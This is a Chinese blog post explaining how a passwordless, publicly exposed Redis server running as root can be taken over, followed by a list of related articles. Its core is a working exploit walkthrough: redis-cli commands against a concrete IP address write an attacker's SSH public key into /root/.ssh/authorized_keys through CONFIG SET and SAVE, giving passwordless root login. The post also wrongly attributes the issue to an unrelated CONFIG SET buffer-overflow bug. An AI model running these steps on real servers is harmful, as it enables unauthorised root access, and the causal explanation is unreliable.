[安全] Linux系统上因Redis未设置密码而导致的安全问题

最新推荐文章于 2023-08-08 20:09:43 发布
最新推荐文章于 2023-08-08 20:09:43 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: redis 安全 文章标签: redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cdk19911021/article/details/79661322
版权

漏洞概述:
在一定条件下,会出现以下安全问题
1.任何人能够远程访问Redis,读取Redis数据。
2.使用Redis的一些命令,可以向服务器上写入公钥,使用私钥无密码登录服务器,进行远程控制。

漏洞产生的原因:
Redis 3.2.x < 3.2.4版本存在缓冲区溢出漏洞,可导致任意代码执行。Redis数据结构存储的CONFIG SET命令中client-output-buffer-limit选项处理存在越界写漏洞。构造的CONFIG SET命令可导致越界写,代码执行。

产生安全问题的条件:
1.Redis没有设置密码
2.Redis使用默认账号root
3.Redis端口暴露在公网
4.Redis没有限制访问IP

漏洞利用的过程:
1.在本地生成公私钥
2.将公钥写入Redis

cat id_rsa.pub |redis-cli -h 222.73.110.3 -x set crackit

3.将公钥写进受害者主机的/root/.ssh下,并且名称为authorized_keys

222.73.110.3:6379> CONFIG GET dir
1) "dir"
2) "/var/lib/redis"
222.73.110.3:6379> CONFIG set dir /root/.ssh/
OK
222.73.110.3:6379> config set dbfilename "authorized_keys"
OK
222.73.110.3:6379> save
OK
222.73.110.3:6379> CONFIG set dir /var/lib/redis
OK
222.73.110.3:6379> save
OK

这样我们就完成了远程无密码访问。

陈丁恺
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux安全配置标准
06-25
- 设定合理的用户界面超时设置,减少因长时间操作而导致安全风险。 - **设置NTP时间同步**: - 确保所有服务器之间的时间同步,这对于审计和日志分析非常重要。 - **禁止安装/运行不必要的服务**: - 禁止...
linux系统redis安装配置教程.md
最新发布
06-13
本文档将详细介绍如何在Linux系统上安装、配置并使用Redis。 #### 二、安装Redis ##### 2.1 更新系统包 在安装Redis之前,首先需要更新系统包列表以确保安装最新的软件包和依赖项。 - 对于基于Debian的系统(如...
Linux Redis自动化挖矿感染蠕虫分析及安全建议
weixin_33766805的博客
06-12 582
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 自从Redis授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行为一直层出不穷;而在众多利用该问题入侵服务器进行黑产行为的案例中,其中就存在一类利用该问题进行挖矿并且会利用pnscan自动扫描感染其他机器...
公网中Redis使用注意事项(Linux系统
yudian1991的博客
03-14 6068
公网环境中使用redis一定要注意安全,否则很容易被攻击。自己的一台服务器安装了redis,由于没有安全意识(没有设置密码)导致被攻击,服务器的CPU和内存资源几乎被消耗殆尽,印象深刻
【实验记录】——Redis端口暴露到公网没设密码导致key丢失
weixin_46146755的博客
03-05 474
这是什么啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊 设置密码 设置成功 application.yml文件更改 spring.redis.password=westos
【经历毒打,非技术文章】被redis密码入侵
深渊码头
03-14 6023
昨天和凌晨自己的两台服务器都中毒了,原因是使用我的redis密码入侵的; 执行了这一串代码,凌晨2点系统告诉我系统被植入病毒了,我修修补补了一下,以为另一台服务器不会被植入的,结果4点多我的集群就中了。哎,要相信直觉 写了一个定时任务叫 dog 我记得他们的时间是 20 ,30,45,55都去执行下载文件的 会删除所有redis数据 病毒去下载奇奇怪怪的玩意下来,不过下载完了会自删除,和我另一台服务器中毒执行的不一样,有空在折腾吧,不影响我的操作,打算钓鱼一...
linux redis病毒,Linux系统Redis扩散病毒继续分析
weixin_35459464的博客
05-14 271
* soft nproc 100000root hard nproc 100000root soft nproc 100000EOF#防火墙修改redis只让本机访问iptables -I INPUT 1 -p tcp --dport 6379-j DROPiptables -I INPUT 1 -p tcp --...
完美解决linux上启动redis后配置文件生效的问题
09-09
总结来说,解决Linux上启动Redis后配置文件生效的问题,关键在于启动Redis服务时,通过命令行明确指定配置文件的位置。同时,确认Redis服务有读取配置文件的权限。通过正确的方式启动Redis,可以确保配置文件的...
linux安装redis
05-28
对于远程访问,为了提高安全性,建议设置访问密码。 ```ini requirepass 123456 ``` #### 六、启动与管理Redis服务 完成以上步骤后,可以启动Redis服务: - **启动服务**: ```bash redis-server redis....
linux下的redis安装包含配置文件
09-29
Linux系统中,Redis是一个广泛使用的高性能键值存储系统,常用于数据库、缓存和消息代理等场景。本文将详细讲解如何在Linux环境下安装...在实际操作过程中,一定要仔细检查每一项配置,避免因配置错误导致问题
记一次Redis被入侵(被黑)处理过程
nelson的博客
05-22 3327
通常作为一名后端程序员,并没有系统的学习过关于服务器安防相关的知识,遇到服务器被黑的情况往往比较迷茫,不知道从何下手。服务器可能遭受的攻击多种多样,以下主要讲述的是我本次遇到的一次服务器被黑客拿来当矿机的处理过程。 攻击的发现 之所以发现服务器被攻击了是因为有用户反馈系统卡顿非常严重,我知道一般用户反馈描述的那个时间点不应该会有这么高的延迟的,所以就登录服务器查看以下CPU等资源的消耗情况。(挖矿...
RedisLinux系统上因Redis设置密码导致安全问题
运维技术博客
03-22 2757
文章目录1. 漏洞概述2. 漏洞产生的原因:3. 产生安全问题的条件4. 漏洞利用的过程5. 解决方案 1. 漏洞概述 在一定条件下,Redis没有设置密码,会出现一些安全问题 任何人都能远程连接 Redis,读取 Redis 中的数据 使用 Redis 的一些命令,可以在 服务器上写入 SSH 公钥,使用私钥免密登录到服务器上 2. 漏洞产生的原因: Redis 3.2.x < 3.2.4 版本存在缓冲区溢出漏洞,可导致任意代码执行。Redis数据结构存储的 CONFIG SET 命令中 cli
linuxredis病毒pscan,Docker的redis容器导致被挖矿病毒*kdevtmpfsi * 入侵, 干它
weixin_29218509的博客
05-14 552
以下内容全凭记忆。研发的一台docker创建了redis容器,直接设置无密访问导致被入侵。在母机上查询一下,其实第一个就可以了,第二个很多人搜索不到。[root@devtest tmp]# find / -name "*kdevtmpfsi*"/var/lib/docker/overlay2/0cf543cd0ddd70e9e68333057aefa1ca0c1864e5214630b4dd2f4...
Redis基础&远程访问
Mapinyi666的博客
08-08 4719
监听配置(默认监听地址是回环地址),只通过本地回环地址来访问,外部是无法访问的监听端口号 6379tcp的访问日志tcp的保持链接时间是否允许后台访问 默认是no是否启用man日志登录时需要密码则修改下图的内容 后面加上密码解除注释会发现有两个配置文件redis.conf 是主配置文件redis-sentinel.conf 哨兵模式配置文件分析一个程序如何启动的进入cd /usr/lib/systemd/system 路径里面有启动服务的脚本进入看启动命令配置项。
记一次Linux服务器因redis漏洞的挖矿病毒入侵
weixin_30387663的博客
04-13 478
中毒原因,redis bind 0.0.0.0 而且没有密码,和安全意识太薄弱。 所以,redis一定要设密码,改端口,不要用root用户启动,如果业务没有需要,不要bind 0.0.0.0!!!!!!!!!!! 这个病毒能都横向传播,不要以为在外网redis的端口不通就没有事情。只要内网里有机器感染了病毒,就可以继续感染。 病症:CPU被不明进程吃满。 该病毒主要是通过,crontab定...
Redis安全设置 - 设置密码、禁用指令
大大的微笑的专栏
09-15 5526
Redis安全设置 redis默认安装完成后,没有登录密码安全设置没有密码系统安全隐患很大,另外如果发生一些误操作,比如FLUSHALL会导致整个库被清空,所以为了安全起见,需要设置reids的安全配置项,具体内容如下: 1.  设置密码 找到redis.conf配置文件中的requirepass项,在后面加入redis访问密码密码一定要有大小写字母、特殊符号、数字和字母组合,例
修补--Redis授权访问漏洞
weixin_30342209的博客
01-09 327
--------------------------------阿里云解决方案-----------------------------------一.漏洞描述Redis因配置不当可以导致授权访问,被攻击者恶意利用。当前流行的针对Redis授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服...
Redis安全问题
归子莫的博客
03-08 761
Redis安全问题 redis默认不需要使用密码,需要在redis.conf文件中配置,但是密码是明文传输的,在linux中要注意对redis.conf文件的权限控制 在windows下是redis.windows.conf 设置密码,去掉注释符,记得要重启服务 通过命令来设置 查看密码 设置密码 验证 ...
redis密码漏洞不加密码的解决方案
07-27 746
漏洞描述:http://blog.51cto.com/simeon/2115184?wx= 概述: 无密码登陆的redis里,利用config去执行远程本地命令 解决: 可以设置redis密码或者更改bindip,但会限制原先免密码登陆的应用。 可以修改config命令为无效 vim /data/redis/conf/36379/redis.conf 添加 rename-command CONFIG "" rename-command EVAL "" ...
linux中的redis设置密码
10-27
需要注意的是,当前这种Linux配置Redis密码的方法是一种临时的,如果Redis重启之后密码就会失效。如果在服务器中搭建了Redis设置密码的话,可能会被入侵导致CPU瞬间飙高,因此最好设置一下密码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值